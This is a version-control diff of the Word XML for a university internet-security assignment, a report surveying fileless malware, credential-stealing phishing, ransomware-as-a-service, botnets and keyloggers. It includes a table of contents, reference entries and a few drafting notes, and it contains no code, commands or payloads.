+        <w:t xml:space="preserve"> stands out as the most dangerous. It operates entirely in system memory, leaves no files behind, and leverages trusted system tools like PowerShell to carry out its actions. This makes it incredibly difficult to detect using standard security tools. The literature showed consistent evidence of its stealth and growing use in advanced persistent threat (APT) campaigns. The experiment further confirmed this, where a fileless payload successfully opened a remote shell on the victim machine without triggering any alarms. These characteristics position fileless malware as a critical threat to modern </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6366,7 +6548,19 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve">, though difficult to replicate ethically, represents the commercialization of malware. Its financial impact is unmatched, especially in sectors like healthcare, education, and finance. The affiliate model has made high-end ransomware accessible to lower-skilled attackers, making this threat harder to contain at </w:t>
+        <w:t>, though difficult to replicate ethically, represents the commerciali</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ation of malware. Its financial impact is unmatched, especially in sectors like healthcare, education, and finance. The affiliate model has made high-end ransomware accessible to lower-skilled attackers, making this threat harder to contain at </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6654,6 +6848,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Bashir, M., &amp; Papadopoulos, P. (2023). HTTPS abuse in phishing: Trust indicators and user deception. </w:t>
       </w:r>
       <w:r>
@@ -6693,7 +6888,6 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Bhardwaj, A., &amp; Goundar, S. (2020). Keyloggers: Silent cyber security weapons. </w:t>
       </w:r>
       <w:r>
@@ -7143,6 +7337,136 @@
         </w:rPr>
         <w:t>, 102987.</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">No need to elaborate on implementation steps – </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">because its </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>someone</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> else’s work</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Just introduce the topic, analyse the result, and synthesis, </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Sandbox is just a simple network </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -15797,6 +16121,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/COS80013 - Internet Security/Projects/Assignment_1.docx
+++ b/COS80013 - Internet Security/Projects/Assignment_1.docx
@@ -2,1069 +2,869 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:body>
-    <w:sdt>
-      <w:sdtPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
+    <w:p/>
+    <w:bookmarkStart w:id="0" w:name="_MON_993026936"/>
+    <w:bookmarkEnd w:id="0"/>
+    <w:bookmarkStart w:id="1" w:name="_MON_993026913"/>
+    <w:bookmarkEnd w:id="1"/>
+    <w:p>
+      <w:pPr>
+        <w:framePr w:w="1170" w:h="721" w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1081" w:y="1"/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="6" w:space="1" w:color="FFFFFF"/>
+          <w:left w:val="single" w:sz="6" w:space="1" w:color="FFFFFF"/>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="FFFFFF"/>
+          <w:right w:val="single" w:sz="6" w:space="1" w:color="FFFFFF"/>
+        </w:pBdr>
+        <w:ind w:right="-351"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:object w:dxaOrig="2056" w:dyaOrig="4126" w14:anchorId="26009667">
+          <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+            <v:stroke joinstyle="miter"/>
+            <v:formulas>
+              <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+              <v:f eqn="sum @0 1 0"/>
+              <v:f eqn="sum 0 0 @1"/>
+              <v:f eqn="prod @2 1 2"/>
+              <v:f eqn="prod @3 21600 pixelWidth"/>
+              <v:f eqn="prod @3 21600 pixelHeight"/>
+              <v:f eqn="sum @0 0 1"/>
+              <v:f eqn="prod @6 1 2"/>
+              <v:f eqn="prod @7 21600 pixelWidth"/>
+              <v:f eqn="sum @8 21600 0"/>
+              <v:f eqn="prod @7 21600 pixelHeight"/>
+              <v:f eqn="sum @10 21600 0"/>
+            </v:formulas>
+            <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+            <o:lock v:ext="edit" aspectratio="t"/>
+          </v:shapetype>
+          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:53.65pt;height:106.15pt" o:ole="" fillcolor="window">
+            <v:imagedata r:id="rId7" o:title=""/>
+          </v:shape>
+          <o:OLEObject Type="Embed" ProgID="Word.Picture.8" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1805301667" r:id="rId8"/>
+        </w:object>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Swinburne University </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>Of</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Technology</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-AU"/>
-          <w14:ligatures w14:val="standardContextual"/>
-        </w:rPr>
-        <w:id w:val="1916820585"/>
-        <w:docPartObj>
-          <w:docPartGallery w:val="Table of Contents"/>
-          <w:docPartUnique/>
-        </w:docPartObj>
-      </w:sdtPr>
-      <w:sdtEndPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:noProof/>
-        </w:rPr>
-      </w:sdtEndPr>
-      <w:sdtContent>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOCHeading"/>
-            <w:jc w:val="center"/>
-          </w:pPr>
-          <w:r>
-            <w:t>Contents</w:t>
-          </w:r>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9356"/>
-            </w:tabs>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-          </w:pPr>
-          <w:r>
-            <w:fldChar w:fldCharType="begin"/>
-          </w:r>
-          <w:r>
-            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
-          </w:r>
-          <w:r>
-            <w:fldChar w:fldCharType="separate"/>
-          </w:r>
-          <w:hyperlink w:anchor="_Toc194070977" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="68A0B0" w:themeColor="hyperlink" w:themeTint="BF"/>
-              </w:rPr>
-              <w:t>1. Introduction</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc194070977 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>1</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9356"/>
-            </w:tabs>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc194070978" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="68A0B0" w:themeColor="hyperlink" w:themeTint="BF"/>
-              </w:rPr>
-              <w:t>2.Malware from an Attacker’s Perspective</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc194070978 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>1</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC2"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9356"/>
-            </w:tabs>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc194070979" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="68A0B0" w:themeColor="hyperlink" w:themeTint="BF"/>
-              </w:rPr>
-              <w:t>2.1 Fileless Malware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc194070979 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>1</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC2"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9356"/>
-            </w:tabs>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc194070980" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="68A0B0" w:themeColor="hyperlink" w:themeTint="BF"/>
-              </w:rPr>
-              <w:t>2.2 Phishing-Based Credential Stealers</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc194070980 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC2"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9356"/>
-            </w:tabs>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc194070981" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="68A0B0" w:themeColor="hyperlink" w:themeTint="BF"/>
-              </w:rPr>
-              <w:t>2.3 Ransomware-as-a-Service (RaaS)</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc194070981 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC2"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9356"/>
-            </w:tabs>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc194070982" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="68A0B0" w:themeColor="hyperlink" w:themeTint="BF"/>
-              </w:rPr>
-              <w:t>2.4 Botnet Malware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc194070982 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC2"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9356"/>
-            </w:tabs>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc194070983" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="68A0B0" w:themeColor="hyperlink" w:themeTint="BF"/>
-              </w:rPr>
-              <w:t>2.5 Keylogger-Based Malware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc194070983 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>7</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9356"/>
-            </w:tabs>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc194070984" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="68A0B0" w:themeColor="hyperlink" w:themeTint="BF"/>
-              </w:rPr>
-              <w:t>3.Implementation</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc194070984 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>8</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
